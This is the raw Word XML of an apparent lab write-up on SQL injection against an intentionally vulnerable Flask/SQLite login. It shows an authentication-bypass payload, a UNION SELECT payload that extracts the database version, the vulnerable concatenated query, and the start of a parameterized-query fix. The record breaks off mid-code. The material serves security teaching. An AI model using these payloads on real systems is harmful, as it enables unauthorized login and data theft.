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3131" w14:textId="33E9348D" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA" w:rsidP="00E10FAA">
      <w:pPr>
        <w:spacing w:before="720" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Web and Application Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6379FDF7" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL Injection, Cross-Site Scripting (XSS), and Secure Coding Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A10CC6A" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="517ED69F" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09FC82FB" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 1: SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37399C45" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="382CC8AD" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 – Exploit the Login Form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291B64DF" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>To test the SQL Injection vulnerability, the following payload was entered in the username field on the /login page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF9988E" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pP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92D2F" w14:paraId="02F44720" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="745E3562" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Username:  ' OR '1'='1' --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D32DA79" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Password:  x  (any value)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70595111" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="300" w:type="dxa"/>
          <w:left w:w="200" w:type="dxa"/>
          <w:bottom w:w="300" w:type="dxa"/>
          <w:right w:w="200" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="00892D2F" w14:paraId="529F7C1F"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7F7"/>
          </w:tcPr>
          <w:p w14:paraId="2D87ED18" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="1D43D545" wp14:editId="4E597B6D">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5689600" cy="31984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689600" cy="3198495"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B699943" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D297DAD" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Why the Attack Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC723A0" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerable login route builds the SQL query by directly concatenating user-supplied input into the query string:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AE796F" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pP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92D2F" w14:paraId="24FA9B0E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6D7555AA" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># VULNERABLE code</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49643964" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">query = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>f"SELECT</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> * FROM users WHERE username = '{username}' AND password = '{password}'"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D1B26E0" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55AF4175" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>With the payload above, the final query sent to the database becomes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6EF66D" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pP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92D2F" w14:paraId="0E6BC7FB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1EF09408" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SELECT * FROM users WHERE username = '' OR '1'='1' --' AND password = 'x'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57E3B030" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54EB10A1" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The injected logic transforms the WHERE clause so it always evaluates to TRUE. The condition '1'='1' is always satisfied, meaning every row in the users table matches. The double-dash (--) is an SQL comment marker that causes everything after it including the password check to be ignored entirely. Because </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fetchone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() returns the first matching row, the attacker is logged in as the first user in the database (admin) without knowing the real password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E9DF9B" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F342576" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 – UNION SELECT Version Extraction (Optional Challenge)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8DE5C7" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>To extract the SQLite version, the following UNION SELECT payload was used in the username field:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B4C8D4" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pP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92D2F" w14:paraId="67B53650" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="76893611" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Username:  ' UNION SELECT 1, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sqlite_version</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(), 3 --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08EC2E34" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Password:  x</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DF18876" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="260CD1D6" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The original SELECT returns three columns (id, username, password). The UNION SELECT must match this column count, so column 1 and 3 are given dummy values (1 and 3), while column 2 (username) is replaced with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sqlite_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(). The application then displays the version number in place of the username in the welcome message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DAD6B5" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6BC108" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42D94398" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24030971" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="238E0B1F" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="300" w:type="dxa"/>
          <w:left w:w="200" w:type="dxa"/>
          <w:bottom w:w="300" w:type="dxa"/>
          <w:right w:w="200" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="00892D2F" w14:paraId="018D7AF0"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7F7"/>
          </w:tcPr>
          <w:p w14:paraId="1B4D5A4A" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="3" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="59E0E9C0" wp14:editId="24744CD5">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>635</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5689600" cy="31984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689600" cy="3198495"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:anchor>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BB2098D" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6825412F" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7842A10B" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F2919FC" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.3 – Mitigation: Parameterized Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D69D1B" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The fix is to replace string concatenation with a parameterized query (also called a prepared statement). The ? placeholders tell the database driver to treat the user input as literal data — not as executable SQL — so injection characters like quotes and dashes have no effect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0255F65F" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D93AA8" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46AC15F3" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D2F0BB" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="016A0D87" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C95B47B" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7639B49D" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED2DFDA" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE26891" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD24941" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705146DC" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="791856B0" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Fixed Code</w:t>
      </w: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92D2F" w14:paraId="5D64487B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="35C28604" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># SECURE code – parameterized query</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="029C0679" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>@app.route('/login', methods=['GET', 'POST'])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36B0FA38" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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login():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E7BFAE8" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    message = ''</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3555687B" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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request.method</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> == 'POST':</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2895F420" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">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username = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>request.form</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>['username']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BC3475E" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        password = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>request.form</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>['password']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D95AF86" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        conn = sqlite3.connect('</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>database.db</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="627B815E" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        c = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>conn.cursor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="371EDD3F" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
